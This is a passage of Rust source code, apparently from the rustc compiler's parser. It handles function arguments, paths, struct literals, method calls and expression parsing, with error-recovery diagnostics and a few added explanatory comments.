&mut err,
pat,
require_name,
is_trait_item,
) {
err.emit();
return Ok(dummy_arg(ident));
} else {
return Err(err);
}
}
self.eat_incorrect_doc_comment("a method argument's type");
(pat, self.parse_ty_common(true, true, allow_c_variadic)?)
} else {
debug!("parse_arg_general ident_to_pat");
let parser_snapshot_before_ty = self.clone();
self.eat_incorrect_doc_comment("a method argument's type");
let mut ty = self.parse_ty_common(true, true, allow_c_variadic);
if ty.is_ok() && self.token != token::Comma &&
self.token != token::CloseDelim(token::Paren) {
// This wasn't actually a type, but a pattern looking like a type,
// so we are going to rollback and re-parse for recovery.
ty = self.unexpected();
}
match ty {
Ok(ty) => {
let ident = Ident::new(kw::Invalid, self.prev_span);
let pat = P(Pat {
id: ast::DUMMY_NODE_ID,
node: PatKind::Ident(
BindingMode::ByValue(Mutability::Immutable), ident, None),
span: ty.span,
});
(pat, ty)
}
Err(mut err) => {
// If this is a C-variadic argument and we hit an error, return the
// error.
if self.token == token::DotDotDot {
return Err(err);
}
// Recover from attempting to parse the argument as a type without pattern.
err.cancel();
mem::replace(self, parser_snapshot_before_ty);
self.recover_arg_parse()?
}
}
};
Ok(Arg { ty, pat, id: ast::DUMMY_NODE_ID })
}
/// Parses an argument in a lambda header (e.g., `|arg, arg|`).
fn parse_fn_block_arg(&mut self) -> PResult<'a, Arg> {
let pat = self.parse_pat(Some("argument name"))?;
let t = if self.eat(&token::Colon) {
self.parse_ty()?
} else {
P(Ty {
id: ast::DUMMY_NODE_ID,
node: TyKind::Infer,
span: self.prev_span,
})
};
Ok(Arg {
ty: t,
pat,
id: ast::DUMMY_NODE_ID
})
}
fn maybe_parse_fixed_length_of_vec(&mut self) -> PResult<'a, Option<P<ast::Expr>>> {
if self.eat(&token::Semi) {
Ok(Some(self.parse_expr()?))
} else {
Ok(None)
}
}
/// Matches `'-' lit | lit` (cf. `ast_validation::AstValidator::check_expr_within_pat`).
crate fn parse_literal_maybe_minus(&mut self) -> PResult<'a, P<Expr>> {
maybe_whole_expr!(self);
let minus_lo = self.span;
let minus_present = self.eat(&token::BinOp(token::Minus));
let lo = self.span;
let literal = self.parse_lit()?;
let hi = self.prev_span;
let expr = self.mk_expr(lo.to(hi), ExprKind::Lit(literal), ThinVec::new());
if minus_present {
let minus_hi = self.prev_span;
let unary = self.mk_unary(UnOp::Neg, expr);
Ok(self.mk_expr(minus_lo.to(minus_hi), unary, ThinVec::new()))
} else {
Ok(expr)
}
}
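// Illustrative note (not from the original source): `-42` parses here as a
// unary negation wrapped around the literal `42`, roughly
// `ExprKind::Unary(UnOp::Neg, <lit 42>)`, spanning from the `-` through the
// literal; there is no negative literal token.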
fn parse_path_segment_ident(&mut self) -> PResult<'a, ast::Ident> {
match self.token {
token::Ident(ident, _) if self.token.is_path_segment_keyword() => {
let span = self.span;
self.bump();
Ok(Ident::new(ident.name, span))
}
_ => self.parse_ident(),
}
}
fn parse_ident_or_underscore(&mut self) -> PResult<'a, ast::Ident> {
match self.token {
token::Ident(ident, false) if ident.name == kw::Underscore => {
let span = self.span;
self.bump();
Ok(Ident::new(ident.name, span))
}
_ => self.parse_ident(),
}
}
/// Parses a qualified path.
/// Assumes that the leading `<` has been parsed already.
///
/// `qualified_path = <type [as trait_ref]>::path`
///
/// # Examples
/// `<T>::default`
/// `<T as U>::a`
/// `<T as U>::F::a<S>` (without disambiguator)
/// `<T as U>::F::a::<S>` (with disambiguator)
fn parse_qpath(&mut self, style: PathStyle) -> PResult<'a, (QSelf, ast::Path)> {
let lo = self.prev_span;
let ty = self.parse_ty()?;
// `path` will contain the prefix of the path up to the `>`,
// if any (e.g., `U` in the `<T as U>::*` examples
// above). `path_span` has the span of that path, or an empty
// span in the case of something like `<T>::Bar`.
let (mut path, path_span);
if self.eat_keyword(kw::As) {
let path_lo = self.span;
path = self.parse_path(PathStyle::Type)?;
path_span = path_lo.to(self.prev_span);
} else {
path_span = self.span.to(self.span);
path = ast::Path { segments: Vec::new(), span: path_span };
}
// See doc comment for `unmatched_angle_bracket_count`.
self.expect(&token::Gt)?;
if self.unmatched_angle_bracket_count > 0 {
self.unmatched_angle_bracket_count -= 1;
debug!("parse_qpath: (decrement) count={:?}", self.unmatched_angle_bracket_count);
}
self.expect(&token::ModSep)?;
let qself = QSelf { ty, path_span, position: path.segments.len() };
self.parse_path_segments(&mut path.segments, style)?;
Ok((qself, ast::Path { segments: path.segments, span: lo.to(self.prev_span) }))
}
/// Parses simple paths.
///
/// `path = [::] segment+`
/// `segment = ident | ident[::]<args> | ident[::](args) [-> type]`
///
/// # Examples
/// `a::b::C<D>` (without disambiguator)
/// `a::b::C::<D>` (with disambiguator)
/// `Fn(Args)` (without disambiguator)
/// `Fn::(Args)` (with disambiguator)
pub fn parse_path(&mut self, style: PathStyle) -> PResult<'a, ast::Path> {
maybe_whole!(self, NtPath, |path| {
if style == PathStyle::Mod &&
path.segments.iter().any(|segment| segment.args.is_some()) {
self.diagnostic().span_err(path.span, "unexpected generic arguments in path");
}
path
});
let lo = self.meta_var_span.unwrap_or(self.span);
let mut segments = Vec::new();
let mod_sep_ctxt = self.span.ctxt();
if self.eat(&token::ModSep) {
segments.push(PathSegment::path_root(lo.shrink_to_lo().with_ctxt(mod_sep_ctxt)));
}
self.parse_path_segments(&mut segments, style)?;
Ok(ast::Path { segments, span: lo.to(self.prev_span) })
}
/// Like `parse_path`, but also supports parsing `Word` meta items into paths for
/// backwards-compatibility. This is used when parsing derive macro paths in `#[derive]`
/// attributes.
pub fn parse_path_allowing_meta(&mut self, style: PathStyle) -> PResult<'a, ast::Path> {
let meta_ident = match self.token {
token::Interpolated(ref nt) => match **nt {
token::NtMeta(ref meta) => match meta.node {
ast::MetaItemKind::Word => Some(meta.path.clone()),
_ => None,
},
_ => None,
},
_ => None,
};
if let Some(path) = meta_ident {
self.bump();
return Ok(path);
}
self.parse_path(style)
}
crate fn parse_path_segments(&mut self,
segments: &mut Vec<PathSegment>,
style: PathStyle)
-> PResult<'a, ()> {
loop {
let segment = self.parse_path_segment(style)?;
if style == PathStyle::Expr {
// In order to check for trailing angle brackets, we must have finished
// recursing (`parse_path_segment` can indirectly call this function),
// that is, the next token must be the highlighted part of the below example:
//
// `Foo::<Bar as Baz<T>>::Qux`
// ^ here
//
// As opposed to the below highlight (if we had only finished the first
// recursion):
//
// `Foo::<Bar as Baz<T>>::Qux`
// ^ here
//
// `PathStyle::Expr` is only provided at the root invocation and never in
// `parse_path_segment` to recurse and therefore can be checked to maintain
// this invariant.
self.check_trailing_angle_brackets(&segment, token::ModSep);
}
segments.push(segment);
if self.is_import_coupler() || !self.eat(&token::ModSep) {
return Ok(());
}
}
}
fn parse_path_segment(&mut self, style: PathStyle) -> PResult<'a, PathSegment> {
let ident = self.parse_path_segment_ident()?;
let is_args_start = |token: &token::Token| match *token {
token::Lt | token::BinOp(token::Shl) | token::OpenDelim(token::Paren)
| token::LArrow => true,
_ => false,
};
let check_args_start = |this: &mut Self| {
this.expected_tokens.extend_from_slice(
&[TokenType::Token(token::Lt), TokenType::Token(token::OpenDelim(token::Paren))]
);
is_args_start(&this.token)
};
Ok(if style == PathStyle::Type && check_args_start(self) ||
style != PathStyle::Mod && self.check(&token::ModSep)
&& self.look_ahead(1, |t| is_args_start(t)) {
// We use `style == PathStyle::Expr` to check if this is in a recursion or not. If
// it isn't, then we reset the unmatched angle bracket count as we're about to start
// parsing a new path.
if style == PathStyle::Expr {
self.unmatched_angle_bracket_count = 0;
self.max_angle_bracket_count = 0;
}
// Generic arguments are found - `<`, `(`, `::<` or `::(`.
self.eat(&token::ModSep);
let lo = self.span;
let args = if self.eat_lt() {
// `<'a, T, A = U>`
let (args, constraints) =
self.parse_generic_args_with_leaning_angle_bracket_recovery(style, lo)?;
self.expect_gt()?;
let span = lo.to(self.prev_span);
AngleBracketedArgs { args, constraints, span }.into()
} else {
// `(T, U) -> R`
self.bump(); // `(`
let (inputs, recovered) = self.parse_seq_to_before_tokens(
&[&token::CloseDelim(token::Paren)],
SeqSep::trailing_allowed(token::Comma),
TokenExpectType::Expect,
|p| p.parse_ty())?;
if !recovered {
self.bump(); // `)`
}
let span = lo.to(self.prev_span);
let output = if self.eat(&token::RArrow) {
Some(self.parse_ty_common(false, false, false)?)
} else {
None
};
ParenthesizedArgs { inputs, output, span }.into()
};
PathSegment { ident, args, id: ast::DUMMY_NODE_ID }
} else {
// Generic arguments are not found.
PathSegment::from_ident(ident)
})
}
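// Illustrative note (not from the original source): the two generic-argument
// forms accepted above.
//
//     Iterator<Item = u8>  -> AngleBracketedArgs (args + constraints)
//     Fn(u8) -> bool       -> ParenthesizedArgs (inputs + output)
//
// In expression position the `::` disambiguator is required, e.g.
// `iter.collect::<Vec<_>>()`, which is why the `PathStyle::Expr` case also
// looks for `::<` / `::(` before treating `<` as the start of arguments.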
crate fn check_lifetime(&mut self) -> bool {
self.expected_tokens.push(TokenType::Lifetime);
self.token.is_lifetime()
}
/// Parses a single lifetime `'a` or panics.
crate fn expect_lifetime(&mut self) -> Lifetime {
if let Some(ident) = self.token.lifetime() {
let span = self.span;
self.bump();
Lifetime { ident: Ident::new(ident.name, span), id: ast::DUMMY_NODE_ID }
} else {
self.span_bug(self.span, "not a lifetime")
}
}
fn eat_label(&mut self) -> Option<Label> {
if let Some(ident) = self.token.lifetime() {
let span = self.span;
self.bump();
Some(Label { ident: Ident::new(ident.name, span) })
} else {
None
}
}
/// Parses mutability (`mut` or nothing).
fn parse_mutability(&mut self) -> Mutability {
if self.eat_keyword(kw::Mut) {
Mutability::Mutable
} else {
Mutability::Immutable
}
}
fn parse_field_name(&mut self) -> PResult<'a, Ident> {
if let token::Literal(token::Lit { kind: token::Integer, symbol, suffix }) = self.token {
self.expect_no_suffix(self.span, "a tuple index", suffix);
self.bump();
Ok(Ident::new(symbol, self.prev_span))
} else {
self.parse_ident_common(false)
}
}
/// Parses `ident (COLON expr)?`.
fn parse_field(&mut self) -> PResult<'a, Field> {
let attrs = self.parse_outer_attributes()?;
let lo = self.span;
// Check if a colon exists one ahead. This means we're parsing a fieldname.
let (fieldname, expr, is_shorthand) = if self.look_ahead(1, |t| {
t == &token::Colon || t == &token::Eq
}) {
let fieldname = self.parse_field_name()?;
// Check for an equals token. This means the source incorrectly attempts to
// initialize a field with an eq rather than a colon.
if self.token == token::Eq {
self.diagnostic()
.struct_span_err(self.span, "expected `:`, found `=`")
.span_suggestion(
fieldname.span.shrink_to_hi().to(self.span),
"replace equals symbol with a colon",
":".to_string(),
Applicability::MachineApplicable,
)
.emit();
}
self.bump(); // `:`
(fieldname, self.parse_expr()?, false)
} else {
let fieldname = self.parse_ident_common(false)?;
// Mimic `x: x` for the `x` field shorthand.
let path = ast::Path::from_ident(fieldname);
let expr = self.mk_expr(fieldname.span, ExprKind::Path(None, path), ThinVec::new());
(fieldname, expr, true)
};
Ok(ast::Field {
ident: fieldname,
span: lo.to(expr.span),
expr,
is_shorthand,
attrs: attrs.into(),
})
}
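// Illustrative note (not from the original source): in a struct expression
// such as `Foo { x: 1, y }`, the `x: 1` field takes the explicit branch
// (`is_shorthand: false`), while `y` takes the shorthand branch above and is
// expanded to the equivalent of `y: y`, a path expression naming `y`, with
// `is_shorthand: true`.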
crate fn mk_expr(&self, span: Span, node: ExprKind, attrs: ThinVec<Attribute>) -> P<Expr> {
P(Expr { node, span, attrs, id: ast::DUMMY_NODE_ID })
}
fn mk_unary(&self, unop: ast::UnOp, expr: P<Expr>) -> ast::ExprKind {
ExprKind::Unary(unop, expr)
}
fn mk_binary(&self, binop: ast::BinOp, lhs: P<Expr>, rhs: P<Expr>) -> ast::ExprKind {
ExprKind::Binary(binop, lhs, rhs)
}
fn mk_call(&self, f: P<Expr>, args: Vec<P<Expr>>) -> ast::ExprKind {
ExprKind::Call(f, args)
}
fn mk_index(&self, expr: P<Expr>, idx: P<Expr>) -> ast::ExprKind {
ExprKind::Index(expr, idx)
}
fn mk_range(&self,
start: Option<P<Expr>>,
end: Option<P<Expr>>,
limits: RangeLimits)
-> PResult<'a, ast::ExprKind> {
if end.is_none() && limits == RangeLimits::Closed {
Err(self.span_fatal_err(self.span, Error::InclusiveRangeWithNoEnd))
} else {
Ok(ExprKind::Range(start, end, limits))
}
}
fn mk_assign_op(&self, binop: ast::BinOp,
lhs: P<Expr>, rhs: P<Expr>) -> ast::ExprKind {
ExprKind::AssignOp(binop, lhs, rhs)
}
fn expect_delimited_token_tree(&mut self) -> PResult<'a, (MacDelimiter, TokenStream)> {
let delim = match self.token {
token::OpenDelim(delim) => delim,
_ => {
let msg = "expected open delimiter";
let mut err = self.fatal(msg);
err.span_label(self.span, msg);
return Err(err)
}
};
let tts = match self.parse_token_tree() {
TokenTree::Delimited(_, _, tts) => tts,
_ => unreachable!(),
};
let delim = match delim {
token::Paren => MacDelimiter::Parenthesis,
token::Bracket => MacDelimiter::Bracket,
token::Brace => MacDelimiter::Brace,
token::NoDelim => self.bug("unexpected no delimiter"),
};
Ok((delim, tts.into()))
}
/// At the bottom (top?) of the precedence hierarchy,
/// parses things like parenthesized exprs, macros, `return`, etc.
///
/// N.B., this does not parse outer attributes, and is private because it only works
/// correctly if called from `parse_dot_or_call_expr()`.
fn parse_bottom_expr(&mut self) -> PResult<'a, P<Expr>> {
maybe_recover_from_interpolated_ty_qpath!(self, true);
maybe_whole_expr!(self);
// Outer attributes are already parsed and will be
// added to the return value after the fact.
//
// Therefore, prevent sub-parser from parsing
// attributes by giving them an empty "already parsed" list.
let mut attrs = ThinVec::new();
let lo = self.span;
let mut hi = self.span;
let ex: ExprKind;
// Note: when adding new syntax here, don't forget to adjust Token::can_begin_expr().
match self.token {
token::OpenDelim(token::Paren) => {
self.bump();
attrs.extend(self.parse_inner_attributes()?);
// (e) is parenthesized e
// (e,) is a tuple with only one field, e
let mut es = vec![];
let mut trailing_comma = false;
let mut recovered = false;
while self.token != token::CloseDelim(token::Paren) {
es.push(match self.parse_expr() {
Ok(es) => es,
Err(err) => {
// recover from parse error in tuple list
return Ok(self.recover_seq_parse_error(token::Paren, lo, Err(err)));
}
});
recovered = self.expect_one_of(
&[],
&[token::Comma, token::CloseDelim(token::Paren)],
)?;
if self.eat(&token::Comma) {
trailing_comma = true;
} else {
trailing_comma = false;
break;
}
}
if !recovered {
self.bump();
}
hi = self.prev_span;
ex = if es.len() == 1 && !trailing_comma {
ExprKind::Paren(es.into_iter().nth(0).unwrap())
} else {
ExprKind::Tup(es)
};
}
token::OpenDelim(token::Brace) => {
return self.parse_block_expr(None, lo, BlockCheckMode::Default, attrs);
}
token::BinOp(token::Or) | token::OrOr => {
return self.parse_lambda_expr(attrs);
}
token::OpenDelim(token::Bracket) => {
self.bump();
attrs.extend(self.parse_inner_attributes()?);
if self.eat(&token::CloseDelim(token::Bracket)) {
// Empty vector.
ex = ExprKind::Array(Vec::new());
} else {
// Nonempty vector.
let first_expr = self.parse_expr()?;
if self.eat(&token::Semi) {
// Repeating array syntax: [ 0; 512 ]
let count = AnonConst {
id: ast::DUMMY_NODE_ID,
value: self.parse_expr()?,
};
self.expect(&token::CloseDelim(token::Bracket))?;
ex = ExprKind::Repeat(first_expr, count);
} else if self.eat(&token::Comma) {
// Vector with two or more elements.
let remaining_exprs = self.parse_seq_to_end(
&token::CloseDelim(token::Bracket),
SeqSep::trailing_allowed(token::Comma),
|p| Ok(p.parse_expr()?)
)?;
let mut exprs = vec![first_expr];
exprs.extend(remaining_exprs);
ex = ExprKind::Array(exprs);
} else {
// Vector with one element.
self.expect(&token::CloseDelim(token::Bracket))?;
ex = ExprKind::Array(vec![first_expr]);
}
}
hi = self.prev_span;
}
_ => {
if self.eat_lt() {
let (qself, path) = self.parse_qpath(PathStyle::Expr)?;
hi = path.span;
return Ok(self.mk_expr(lo.to(hi), ExprKind::Path(Some(qself), path), attrs));
}
if self.check_keyword(kw::Move) || self.check_keyword(kw::Static) {
return self.parse_lambda_expr(attrs);
}
if self.eat_keyword(kw::If) {
return self.parse_if_expr(attrs);
}
if self.eat_keyword(kw::For) {
let lo = self.prev_span;
return self.parse_for_expr(None, lo, attrs);
}
if self.eat_keyword(kw::While) {
let lo = self.prev_span;
return self.parse_while_expr(None, lo, attrs);
}
if let Some(label) = self.eat_label() {
let lo = label.ident.span;
self.expect(&token::Colon)?;
if self.eat_keyword(kw::While) {
return self.parse_while_expr(Some(label), lo, attrs)
}
if self.eat_keyword(kw::For) {
return self.parse_for_expr(Some(label), lo, attrs)
}
if self.eat_keyword(kw::Loop) {
return self.parse_loop_expr(Some(label), lo, attrs)
}
if self.token == token::OpenDelim(token::Brace) {
return self.parse_block_expr(Some(label),
lo,
BlockCheckMode::Default,
attrs);
}
let msg = "expected `while`, `for`, `loop` or `{` after a label";
let mut err = self.fatal(msg);
err.span_label(self.span, msg);
return Err(err);
}
if self.eat_keyword(kw::Loop) {
let lo = self.prev_span;
return self.parse_loop_expr(None, lo, attrs);
}
if self.eat_keyword(kw::Continue) {
let label = self.eat_label();
let ex = ExprKind::Continue(label);
let hi = self.prev_span;
return Ok(self.mk_expr(lo.to(hi), ex, attrs));
}
if self.eat_keyword(kw::Match) {
let match_sp = self.prev_span;
return self.parse_match_expr(attrs).map_err(|mut err| {
err.span_label(match_sp, "while parsing this match expression");
err
});
}
if self.eat_keyword(kw::Unsafe) {
return self.parse_block_expr(
None,
lo,
BlockCheckMode::Unsafe(ast::UserProvided),
attrs);
}
if self.is_do_catch_block() {
let mut db = self.fatal("found removed `do catch` syntax");
db.help("Following RFC #2388, the new non-placeholder syntax is `try`");
return Err(db);
}
if self.is_try_block() {
let lo = self.span;
assert!(self.eat_keyword(kw::Try));
return self.parse_try_block(lo, attrs);
}
// Span::rust_2018() is somewhat expensive; don't get it repeatedly.
let is_span_rust_2018 = self.span.rust_2018();
if is_span_rust_2018 && self.check_keyword(kw::Async) {
return if self.is_async_block() { // check for `async {` and `async move {`
self.parse_async_block(attrs)
} else {
self.parse_lambda_expr(attrs)
};
}
if self.eat_keyword(kw::Return) {
if self.token.can_begin_expr() {
let e = self.parse_expr()?;
hi = e.span;
ex = ExprKind::Ret(Some(e));
} else {
ex = ExprKind::Ret(None);
}
} else if self.eat_keyword(kw::Break) {
let label = self.eat_label();
let e = if self.token.can_begin_expr()
&& !(self.token == token::OpenDelim(token::Brace)
&& self.restrictions.contains(
Restrictions::NO_STRUCT_LITERAL)) {
Some(self.parse_expr()?)
} else {
None
};
ex = ExprKind::Break(label, e);
hi = self.prev_span;
} else if self.eat_keyword(kw::Yield) {
if self.token.can_begin_expr() {
let e = self.parse_expr()?;
hi = e.span;
ex = ExprKind::Yield(Some(e));
} else {
ex = ExprKind::Yield(None);
}
} else if self.token.is_keyword(kw::Let) {
// Catch this syntax error here, instead of in `parse_ident`, so
// that we can explicitly mention that let is not to be used as an expression
let mut db = self.fatal("expected expression, found statement (`let`)");
db.span_label(self.span, "expected expression");
db.note("variable declaration using `let` is a statement");
return Err(db);
} else if is_span_rust_2018 && self.eat_keyword(kw::Await) {
let (await_hi, e_kind) = self.parse_await_macro_or_alt(lo, self.prev_span)?;
hi = await_hi;
ex = e_kind;
} else if self.token.is_path_start() {
let path = self.parse_path(PathStyle::Expr)?;
// `!`, as an operator, is prefix, so we know this isn't that
if self.eat(&token::Not) {
// MACRO INVOCATION expression
let (delim, tts) = self.expect_delimited_token_tree()?;
hi = self.prev_span;
ex = ExprKind::Mac(respan(lo.to(hi), Mac_ { path, tts, delim }));
} else if self.check(&token::OpenDelim(token::Brace)) {
if let Some(expr) = self.maybe_parse_struct_expr(lo, &path, &attrs) {
return expr;
} else {
hi = path.span;
ex = ExprKind::Path(None, path);
}
} else {
hi = path.span;
ex = ExprKind::Path(None, path);
}
} else {
if !self.unclosed_delims.is_empty() && self.check(&token::Semi) {
// Don't complain about bare semicolons after unclosed braces
// recovery in order to keep the error count down. Fixing the
// delimiters will possibly also fix the bare semicolon found in
// expression context. For example, silence the following error:
// ```
// error: expected expression, found `;`
// --> file.rs:2:13
// |
// 2 | foo(bar(;
// | ^ expected expression
// ```
self.bump();
return Ok(self.mk_expr(self.span, ExprKind::Err, ThinVec::new()));
}
match self.parse_literal_maybe_minus() {
Ok(expr) => {
hi = expr.span;
ex = expr.node.clone();
}
Err(mut err) => {
self.cancel(&mut err);
return Err(self.expected_expression_found());
}
}
}
}
}
let expr = self.mk_expr(lo.to(hi), ex, attrs);
self.maybe_recover_from_bad_qpath(expr, true)
}
/// Parses `await!(<expr>)` calls, or recovers from the incorrect but reasonable
/// alternative syntaxes `await <expr>`, `await? <expr>`, `await(<expr>)` and
/// `await { <expr> }`.
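///
/// A sketch of the two branches below:
///
/// ```text
/// await!(fut)   // accepted: ExprKind::Await(AwaitOrigin::MacroLike, fut)
/// await fut     // recovered via parse_incorrect_await_syntax
/// ```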
fn parse_await_macro_or_alt(
&mut self,
lo: Span,
await_sp: Span,
) -> PResult<'a, (Span, ExprKind)> {
if self.token == token::Not {
// Handle correct `await!(<expr>)`.
// FIXME: make this an error when `await!` is no longer supported
// https://github.com/rust-lang/rust/issues/60610
self.expect(&token::Not)?;
self.expect(&token::OpenDelim(token::Paren))?;
let expr = self.parse_expr().map_err(|mut err| {
err.span_label(await_sp, "while parsing this await macro call");
err
})?;
self.expect(&token::CloseDelim(token::Paren))?;
Ok((self.prev_span, ExprKind::Await(ast::AwaitOrigin::MacroLike, expr)))
} else { // Handle `await <expr>`.
self.parse_incorrect_await_syntax(lo, await_sp)
}
}
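/// Attempts to parse a struct literal after a path. In positions where
/// `Restrictions::NO_STRUCT_LITERAL` is set (e.g., an `if` condition such as
/// `if S { .. }`), a `{` is ambiguous between a struct literal and a block;
/// we still parse a struct literal when the lookahead rules out a block, so
/// that the "struct literals are not allowed here" error below can suggest
/// parenthesizing it. Returns `None` when no struct literal is attempted.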
fn maybe_parse_struct_expr(
&mut self,
lo: Span,
path: &ast::Path,
attrs: &ThinVec<Attribute>,
) -> Option<PResult<'a, P<Expr>>> {
let struct_allowed = !self.restrictions.contains(Restrictions::NO_STRUCT_LITERAL);
let certainly_not_a_block = || self.look_ahead(1, |t| t.is_ident()) && (
// `{ ident, ` cannot start a block
self.look_ahead(2, |t| t == &token::Comma) ||
self.look_ahead(2, |t| t == &token::Colon) && (
// `{ ident: token, ` cannot start a block
self.look_ahead(4, |t| t == &token::Comma) ||
// `{ ident: ` cannot start a block unless it's a type ascription `ident: Type`
self.look_ahead(3, |t| !t.can_begin_type())
)
);
if struct_allowed || certainly_not_a_block() {
// This is a struct literal, but struct literals may not be accepted in
// this position; parse one anyway for recovery and emit an error below.
let expr = self.parse_struct_expr(lo, path.clone(), attrs.clone());
if let (Ok(expr), false) = (&expr, struct_allowed) {
let mut err = self.diagnostic().struct_span_err(
expr.span,
"struct literals are not allowed here",
);
err.multipart_suggestion(
"surround the struct literal with parentheses",
vec![
(lo.shrink_to_lo(), "(".to_string()),
(expr.span.shrink_to_hi(), ")".to_string()),
],
Applicability::MachineApplicable,
);
err.emit();
}
return Some(expr);
}
None
}
fn parse_struct_expr(&mut self, lo: Span, pth: ast::Path, mut attrs: ThinVec<Attribute>)
-> PResult<'a, P<Expr>> {
let struct_sp = lo.to(self.prev_span);
self.bump();
let mut fields = Vec::new();
let mut base = None;
attrs.extend(self.parse_inner_attributes()?);
while self.token != token::CloseDelim(token::Brace) {
if self.eat(&token::DotDot) {
let exp_span = self.prev_span;
match self.parse_expr() {
Ok(e) => {
base = Some(e);
}
Err(mut e) => {
e.emit();
self.recover_stmt();
}
}
if self.token == token::Comma {
let mut err = self.sess.span_diagnostic.mut_span_err(
exp_span.to(self.prev_span),
"cannot use a comma after the base struct",
);
err.span_suggestion_short(
self.span,
"remove this comma",
String::new(),
Applicability::MachineApplicable
);
err.note("the base struct must always be the last field");
err.emit();
self.recover_stmt();
}
break;
}
let mut recovery_field = None;
if let token::Ident(ident, _) = self.token {
if !self.token.is_reserved_ident() && self.look_ahead(1, |t| *t == token::Colon) {
// Use in case of error after field-looking code: `S { foo: () with a }`
let mut ident = ident.clone();
ident.span = self.span;
recovery_field = Some(ast::Field {
ident,
span: self.span,
expr: self.mk_expr(self.span, ExprKind::Err, ThinVec::new()),
is_shorthand: false,
attrs: ThinVec::new(),
});
}
}
let mut parsed_field = None;
match self.parse_field() {
Ok(f) => parsed_field = Some(f),
Err(mut e) => {
e.span_label(struct_sp, "while parsing this struct");
e.emit();
// If the next token is a comma, then try to parse
// what comes next as additional fields, rather than
// bailing out until next `}`.
if self.token != token::Comma {
self.recover_stmt_(SemiColonMode::Comma, BlockMode::Ignore);
if self.token != token::Comma {
break;
}
}
}
}
match self.expect_one_of(&[token::Comma],
&[token::CloseDelim(token::Brace)]) {
Ok(_) => if let Some(f) = parsed_field.or(recovery_field) {
// only include the field if there's no parse error for the field name
fields.push(f);
}
Err(mut e) => {
if let Some(f) = recovery_field {
fields.push(f);
}
e.span_label(struct_sp, "while parsing this struct");
e.emit();
self.recover_stmt_(SemiColonMode::Comma, BlockMode::Ignore);
self.eat(&token::Comma);
}
}
}
let span = lo.to(self.span);
self.expect(&token::CloseDelim(token::Brace))?;
return Ok(self.mk_expr(span, ExprKind::Struct(pth, fields, base), attrs));
}
fn parse_or_use_outer_attributes(&mut self,
already_parsed_attrs: Option<ThinVec<Attribute>>)
-> PResult<'a, ThinVec<Attribute>> {
if let Some(attrs) = already_parsed_attrs {
Ok(attrs)
} else {
self.parse_outer_attributes().map(|a| a.into())
}
}
/// Parses a block or unsafe block.
crate fn parse_block_expr(
&mut self,
opt_label: Option<Label>,
lo: Span,
blk_mode: BlockCheckMode,
outer_attrs: ThinVec<Attribute>,
) -> PResult<'a, P<Expr>> {
self.expect(&token::OpenDelim(token::Brace))?;
let mut attrs = outer_attrs;
attrs.extend(self.parse_inner_attributes()?);
let blk = self.parse_block_tail(lo, blk_mode)?;
return Ok(self.mk_expr(blk.span, ExprKind::Block(blk, opt_label), attrs));
}
/// Parses `a.b` or `a(13)` or `a[4]` or just `a`.
fn parse_dot_or_call_expr(&mut self,
already_parsed_attrs: Option<ThinVec<Attribute>>)
-> PResult<'a, P<Expr>> {
let attrs = self.parse_or_use_outer_attributes(already_parsed_attrs)?;
let b = self.parse_bottom_expr();
let (span, b) = self.interpolated_or_expr_span(b)?;
self.parse_dot_or_call_expr_with(b, span, attrs)
}
fn parse_dot_or_call_expr_with(&mut self,
e0: P<Expr>,
lo: Span,
mut attrs: ThinVec<Attribute>)
-> PResult<'a, P<Expr>> {
// Stitch the list of outer attributes onto the return value.
// A little bit ugly, but the best way given the current code structure.
self.parse_dot_or_call_expr_with_(e0, lo)
.map(|expr|
expr.map(|mut expr| {
attrs.extend::<Vec<_>>(expr.attrs.into());
expr.attrs = attrs;
match expr.node {
ExprKind::If(..) | ExprKind::IfLet(..) => {
if !expr.attrs.is_empty() {
// Just point to the first attribute in there...
let span = expr.attrs[0].span;
self.span_err(span,
"attributes are not yet allowed on `if` \
expressions");
}
}
_ => {}
}
expr
})
)
}
// Assuming we have just parsed `.`, continue parsing into an expression.
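// Roughly, the suffixes handled here are:
//
//     expr.await     // 2018 edition: ExprKind::Await(FieldLike, expr)
//     expr.f(a, b)   // ExprKind::MethodCall with `expr` as the receiver
//     expr.f         // ExprKind::Field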
fn parse_dot_suffix(&mut self, self_arg: P<Expr>, lo: Span) -> PResult<'a, P<Expr>> {
if self.span.rust_2018() && self.eat_keyword(kw::Await) {
let span = lo.to(self.prev_span);
let await_expr = self.mk_expr(
span,
ExprKind::Await(ast::AwaitOrigin::FieldLike, self_arg),
ThinVec::new(),
);
self.recover_from_await_method_call();
return Ok(await_expr);
}
let segment = self.parse_path_segment(PathStyle::Expr)?;
self.check_trailing_angle_brackets(&segment, token::OpenDelim(token::Paren));
Ok(match self.token {
token::OpenDelim(token::Paren) => {
// Method call `expr.f()`
let mut args = self.parse_unspanned_seq(
&token::OpenDelim(token::Paren),
&token::CloseDelim(token::Paren),
SeqSep::trailing_allowed(token::Comma),
|p| Ok(p.parse_expr()?)
)?;
args.insert(0, self_arg);
let span = lo.to(self.prev_span);
self.mk_expr(span, ExprKind::MethodCall(segment, args), ThinVec::new())
}
_ => {
// Field access `expr.f`
if let Some(args) = segment.args {
self.span_err(args.span(),
"field expressions may not have generic arguments");
}
let span = lo.to(self.prev_span);
self.mk_expr(span, ExprKind::Field(self_arg, segment.ident), ThinVec::new())
}
})
}
fn parse_dot_or_call_expr_with_(&mut self, e0: P<Expr>, lo: Span) -> PResult<'a, P<Expr>> {
let mut e = e0;
let mut hi;
loop {
// expr?
while self.eat(&token::Question) {
let hi = self.prev_span;
e = self.mk_expr(lo.to(hi), ExprKind::Try(e), ThinVec::new());
}
// expr.f
if self.eat(&token::Dot) {
match self.token {
token::Ident(..) => {
e = self.parse_dot_suffix(e, lo)?;
}
token::Literal(token::Lit { kind: token::Integer, symbol, suffix }) => {
let span = self.span;
self.bump();
let field = ExprKind::Field(e, Ident::new(symbol, span));
e = self.mk_expr(lo.to(span), field, ThinVec::new());
self.expect_no_suffix(span, "a tuple index", suffix);
}
token::Literal(token::Lit { kind: token::Float, symbol, .. }) => {
self.bump();
let fstr = symbol.as_str();
let msg = format!("unexpected token: `{}`", symbol);
let mut err = self.diagnostic().struct_span_err(self.prev_span, &msg);
err.span_label(self.prev_span, "unexpected token");
if fstr.chars().all(|x| "0123456789.".contains(x)) {
let float = match fstr.parse::<f64>().ok() {
Some(f) => f,
None => continue,
};
let sugg = pprust::to_string(|s| {
use crate::print::pprust::PrintState;
s.popen()?;
s.print_expr(&e)?;
s.s.word(".")?;
s.print_usize(float.trunc() as usize)?;
s.pclose()?;
s.s.word(".")?;
s.s.word(fstr.splitn(2, ".").last().unwrap().to_string())
});
err.span_suggestion(
